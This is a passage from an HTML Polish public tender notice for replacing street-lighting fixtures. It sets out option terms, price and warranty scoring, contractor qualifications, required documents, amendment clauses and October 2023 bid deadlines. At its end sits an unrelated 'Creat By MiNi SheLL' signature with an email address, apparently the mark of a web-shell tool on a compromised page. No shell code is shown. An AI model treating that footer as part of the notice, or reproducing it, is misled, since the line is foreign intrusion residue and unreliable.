pismem/oświadczeniem,<br/>d)	Zamawiający może z opisanego w SWZ prawa opcji skorzystać w całości lub w części,<br/>e)	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>f)	zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego liczbę opraw oświetlenia ulicznego podlegających wymianie w ramach przedmiotowego uprawnienia Zamawiającego,<br/>g)	termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż 21 dni od dnia przesłania zawiadomienia do Wykonawcy,<br/>h)	Zamawiający zastrzega, że ilość opraw oświetlenia ulicznego podlegających wymianie przewidziana w ramach prawa opcji jest wielkością maksymalną, a ilości te mogą ulec zmniejszeniu w zależności od potrzeb Zamawiającego w trakcie trwania umowy,<br/>i)	Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do trzech miesięcy, licząc od dnia zawarcia umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena brutto oferty (C)	60%<br/>2.	Okres udzielonej gwarancji (G)	40%<br/>	Razem	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej przez komisję przetargową. <br/><br/>CENA<br/>Cena będzie oceniana metodą punktową wg wzoru: <br/>Cena najniższa ze wszystkich ofert × 100 pkt × Znaczenie kryterium 60%/<br/>Cena oferty badanej<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/><br/>OKRES UDZIELONEJ GWARANCJI<br/><br/>Liczba punktów w kryterium okres udzielonej gwarancji będzie przyznawana <br/>w następujący sposób:<br/>1) 3 lata – 0 pkt;<br/>2) 4 lata – 20 pkt;<br/>3) 5 lat – 40 pkt.<br/><br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę przynajmniej minimalnego okresu gwarancji równego 3 lata. W przypadku kiedy Wykonawca nie określi w formularzu ofertowym okresu udzielonej gwarancji Zamawiający przyjmuje, że Wykonawca deklaruje okres 3 lat gwarancji, a w kryterium otrzyma 0 pkt. <br/>Wykonawca na formularzu ofertowym deklaruje okres udzielonej gwarancji.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (S) stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium, obliczonych wg wzoru:<br/>S= C+G<br/>gdzie:<br/>S – łączna ocena punktowa<br/>C – liczba uzyskanych punktów w kryterium cena<br/>G – liczba uzyskanych punktów w kryterium okres udzielonej gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/> <br/>3) sytuacji ekonomicznej lub finansowej;<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej:<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>a) kwalifikacje zawodowe kadry technicznej:<br/><br/>Wykonawca powinien wykazać, że dysponuje lub będzie dysponować co najmniej jedną osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (lub osobą posiadającą odpowiadające w/w uprawnieniom ważne uprawnienia uzyskane na podstawie wcześniej obowiązujących przepisów, lub osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych).<br/><br/>Uwaga: W/w osoby muszą posiadać ważne uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2023 r. poz. 682 ze zm.) <br/>oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831) lub odpowiadające im kwalifikacje nadane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym przedmiotem zamówienia. W przypadku Wykonawców zagranicznych dopuszcza się również kwalifikacje zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych <br/>w państwach członkowskich Unii Europejskiej (Dz.U. z 2023 r. poz. 334). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wg zał. nr 4<br/>do SWZ);<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, lub gdy dokumenty<br/>te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3<br/>ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy,<br/>ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg załącznika nr 9 do SWZ);<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. Wykonawca składa podmiotowe środki dowodowe aktualne na dzień<br/>ich złożenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane razem z ofertą:<br/>1.1. formularz ofertowy (wg zał. nr 1 do SWZ),<br/>1.2. oświadczenie wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia dotyczące przesłanek<br/>wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu w zakresie wskazanym w SWZ (wg<br/>załącznika nr 2a do SWZ),<br/>Wykonawca załącza do oferty również (jeżeli dotyczy):<br/>1.3. oświadczenie podmiotu udostępniającego zasoby dotyczące przesłanek wykluczenia z postępowania oraz spełniania<br/>warunków udziału<br/>w postępowaniu w zakresie wskazanym w SWZ, w jakim podmiot udostępnia swoje zasoby wykonawcy (wg załącznika nr<br/>2b do SWZ),<br/>1.4. samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 4 i 7 ustawy Pzp,<br/>1.5. pełnomocnictwo,<br/>1.6. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (wg zał. nr 6 do SWZ),<br/>1.7. zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia w przypadku gdy Wykonawca, w celu spełnienia warunków, o którym mowa w Rozdziale II pkt 7 ppkt 4 SWZ,<br/>będzie polegał na zdolnościach technicznych lub zawodowych innych podmiotów (wg zał. nr 5 do SWZ),<br/>1.8. zastrzeżenie tajemnicy przedsiębiorstwa,<br/>1.9. wykaz rozwiązań równoważnych.<br/>Zakres i forma składania ww. dokumentów zostały określone w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia.<br/>W takim przypadku:<br/>- ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>- zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, przyjmuje się, że pełnomocnictwo do<br/>podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów,<br/>- pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia<br/>pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie przez<br/>Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są<br/>zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Wymagania dotyczące wykonawców ubiegających się wspólnie o udzielenie zamówienia zostały opisane w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z art. 455 ustawy Pzp Zamawiający dopuszcza możliwość zmiany treści Umowy w stosunku do oferty w<br/>przypadkach:<br/>1) Zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany<br/>przepisów prawa,<br/>2) Zmiany w określeniu Stron Umowy, o ile zasadność tej zmiany wynika z przepisów prawa na skutek np. połączenia,<br/>podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o<br/>ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia,<br/>3) Zmiany terminu realizacji Umowy w przypadku:<br/>a) wystąpienia okoliczności wynikających z Siły Wyższej w rozumieniu § 21 Umowy,<br/>b) w razie zaistnienia szczególnie niekorzystnych i długotrwałych warunków atmosferycznych, uniemożliwiających<br/>wykonanie Przedmiotu umowy zgodnie ze sztuką budowlaną i technologią robót, chyba że opóźnienia z tego powodu nie<br/>wystąpiłyby, gdyby roboty były realizowane przez Wykonawcę̨ w terminach określonych Umową. Wstrzymanie robót z tego<br/>powodu musi być zaakceptowane przez Zamawiającego/inspektora nadzoru.<br/>c) potrzeby opóźnienia rozpoczęcia lub wstrzymania wykonania robót budowlanych z przyczyn niezależnych od<br/>Zamawiającego,<br/>d) aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu materiałów lub urządzeń),<br/>e) zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści Umowy do aktualnego<br/>stanu prawnego,<br/>f) zmiany zasad lub warunków dofinansowania zamówienia,<br/>g) w przypadku możliwości wcześniejszego zakończenia realizacji robót objętych Przedmiotem Umowy przez Wykonawcę,<br/>Strony przewidują skrócenie terminu realizacji określonego w § 3 Umowy,<br/>h) w przypadku opóźnień w wydaniu przez właściwe organy decyzji, pozwoleń, zezwoleń, warunków i innych dokumentów i<br/>oświadczeń niezbędnych do prawidłowego wykonania Umowy, powstałych na skutek okoliczności nie leżących po stronie<br/>Wykonawcy, Zamawiający przewiduje możliwość przedłużenia terminu realizacji Przedmiotu Umowy o okres odpowiadający<br/>okresowi opóźnienia,<br/>j) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione i<br/>niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:<br/>- wstrzymanie robót przez Zamawiającego,<br/>- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,<br/>k) inne przyczyny zewnętrzne niezależne od Zamawiającego i Wykonawcy skutkujące brakiem możliwości prowadzenia<br/>robót, usunięcia wad lub podjęcia innych czynności przewidzianych umową, które spowodowały niezawinione i niemożliwe<br/>do uniknięcia przez Wykonawcę opóźnienie.<br/>4) Zmiany wynagrodzenia brutto w przypadku:<br/>a) w przypadku zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia w trakcie realizacji przedmiotu<br/>zamówienia Strony dokonują odpowiedniej zmiany wynagrodzenia umownego – dotyczy to części wynagrodzenia za roboty,<br/>których w dniu zmiany stawki podatku VAT jeszcze nie wykonano,<br/>b) zmiana zakresu przedmiotu umowy w wyniku rezygnacji przez Zamawiającego z realizacji części Przedmiotu Umowy<br/>wraz ze zmniejszeniem wynagrodzenia Wykonawcy.<br/>5) Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej Umowy w zakresie zmiany zakresu robót<br/>wykonywanych przez podwykonawców.<br/>6) Okoliczności związanych z wystąpieniem COVID-19 wpływających na należyte i terminowe wykonanie umowy.<br/>2. Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały szczegółowo opisane we wzorze umowy<br/>stanowiącym zał. nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa: https://dlugosiodlo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com